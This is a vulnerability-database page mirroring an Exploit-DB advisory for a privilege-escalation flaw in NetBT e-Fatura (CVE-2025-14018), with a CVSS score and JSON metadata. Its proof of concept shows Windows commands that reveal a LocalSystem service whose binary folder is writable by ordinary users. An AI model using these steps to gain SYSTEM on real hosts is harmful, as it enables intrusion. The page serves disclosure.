NetBT e-Fatura – Privilege Escalation_EDB-ID:52509

7.3 / 10

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L

Description

Exploit Title: NetBT e-Fatura - Privilege Escalation Author: Seccops Discovery Date: 2025-10-03 Vendor: https://net-bt.com.tr/e-fatura/ Tested Version: 2024 Tested on OS: Microsoft Windows Server 2019 DC Vulnerability Type: CWE-428 Unquoted Search Path...

Visit Original Source

Basic Information

ID EDB-ID:52509

Published Apr 10, 2026 at 00:00

Affected Product

Affected Versions # Exploit Title: NetBT e-Fatura - Privilege Escalation
# Author: Seccops
# Discovery Date: 2025-10-03
# Vendor: https://net-bt.com.tr/e-fatura/
# Tested Version: 2024
# Tested on OS: Microsoft Windows Server 2019 DC
# Vulnerability Type: CWE-428 Unquoted Search Path or Element
# CVE: CVE-2025-14018

Note: Thanks "Levent Sungu" for providing the testing environment.

====================
Description & Impact
====================
This vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.

================
Proof of Concept
================

C:\Users\efatura>sc qc InboxProcessor
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: InboxProcessor
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\inetpub\wwwroot\InboxProcessor\Netbt.Inbox.Process.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : InboxProcessor
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

C:\Users\efatura\Desktop>accesschk.exe /accepteula -uwdq "C:\inetpub\wwwroot\InboxProcessor\"

Accesschk v6.15 - Reports effective permissions for securable objects
Copyright (C) 2006-2022 Mark Russinovich
Sysinternals - www.sysinternals.com

C:\inetpub\wwwroot\InboxProcessor
RW BUILTIN\Users
RW NT SERVICE\TrustedInstaller
RW NT AUTHORITY\SYSTEM
RW BUILTIN\Administrators

{
    "lastseen": "2026-04-10T16:07:51",
    "description": "Exploit Title: NetBT e-Fatura - Privilege Escalation Author: Seccops Discovery Date: 2025-10-03 Vendor: https://net-bt.com.tr/e-fatura/ Tested Version: 2024 Tested on OS: Microsoft Windows Server 2019 DC Vulnerability Type: CWE-428 Unquoted Search Path...",
    "published": "2026-04-10T00:00:00",
    "modified": "2026-04-10T00:00:00",
    "type": "exploitdb",
    "title": "NetBT e-Fatura - Privilege Escalation",
    "source": "",
    "references": "",
    "id": "EDB-ID:52509",
    "bulletinFamily": "exploit",
    "cwe": null,
    "cvelist": [
        "CVE-2025-14018"
    ],
    "sourceData": "# Exploit Title: NetBT e-Fatura - Privilege Escalation\r\n# Author: Seccops\r\n# Discovery Date: 2025-10-03\r\n# Vendor: https://net-bt.com.tr/e-fatura/\r\n# Tested Version: 2024\r\n# Tested on OS: Microsoft Windows Server 2019 DC\r\n# Vulnerability Type: CWE-428 Unquoted Search Path or Element\r\n# CVE: CVE-2025-14018\r\n\r\nNote: Thanks \"Levent Sungu\" for providing the testing environment.\r\n\r\n====================\r\nDescription & Impact\r\n====================\r\nThis vulnerability allows an unauthorized local user to execute arbitrary code with high privileges on the system.\r\n\r\n================\r\nProof of Concept\r\n================\r\n\r\nC:\\Users\\efatura>sc qc InboxProcessor\r\n[SC] QueryServiceConfig SUCCESS\r\n\r\nSERVICE_NAME: InboxProcessor\r\n        TYPE               : 10  WIN32_OWN_PROCESS\r\n        START_TYPE         : 2   AUTO_START\r\n        ERROR_CONTROL      : 1   NORMAL\r\n        BINARY_PATH_NAME   : C:\\inetpub\\wwwroot\\InboxProcessor\\Netbt.Inbox.Process.exe\r\n        LOAD_ORDER_GROUP   :\r\n        TAG                : 0\r\n        DISPLAY_NAME       : InboxProcessor\r\n        DEPENDENCIES       :\r\n        SERVICE_START_NAME : LocalSystem\r\n\r\n\r\nC:\\Users\\efatura\\Desktop>accesschk.exe /accepteula -uwdq \"C:\\inetpub\\wwwroot\\InboxProcessor\\\"\r\n\r\nAccesschk v6.15 - Reports effective permissions for securable objects\r\nCopyright (C) 2006-2022 Mark Russinovich\r\nSysinternals - www.sysinternals.com\r\n\r\nC:\\inetpub\\wwwroot\\InboxProcessor\r\n  RW BUILTIN\\Users\r\n  RW NT SERVICE\\TrustedInstaller\r\n  RW NT AUTHORITY\\SYSTEM\r\n  RW BUILTIN\\Administrators",
    "sourceHref": "https://www.exploit-db.com/raw/52509",
    "cvss": {
        "score": 7.3,
        "severity": "HIGH",
        "vector": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:L",
        "version": "3.1"
    },
    "cvss2": [],
    "cvss3": {
        "version": "",
        "vectorString": "",
        "baseScore": 0,
        "baseSeverity": "",
        "attackVector": "",
        "attackComplexity": "",
        "privilegesRequired": "",
        "userInteraction": "",
        "scope": "",
        "confidentialityImpact": "",
        "integrityImpact": "",
        "availabilityImpact": "",
        "cvssV3": {
            "version": "",
            "vectorString": "",
            "baseScore": 0,
            "baseSeverity": "",
            "attackVector": "",
            "attackComplexity": "",
            "privilegesRequired": "",
            "userInteraction": "",
            "scope": "",
            "confidentialityImpact": "",
            "integrityImpact": "",
            "availabilityImpact": ""
        }
    },
    "href": "https://www.exploit-db.com/exploits/52509",
    "category_name": "Exploit",
    "post_link": "",
    "product": "",
    "version": "",
    "vendor": "",
    "ai_description": "",
    "ai_severity": "",
    "ai_vendor": "",
    "ai_product": "",
    "ai_version": "",
    "ai_score": 0
}

Description

Basic Information

Affected Product

💭 Join the Security Discussion ❌ Cancel Reply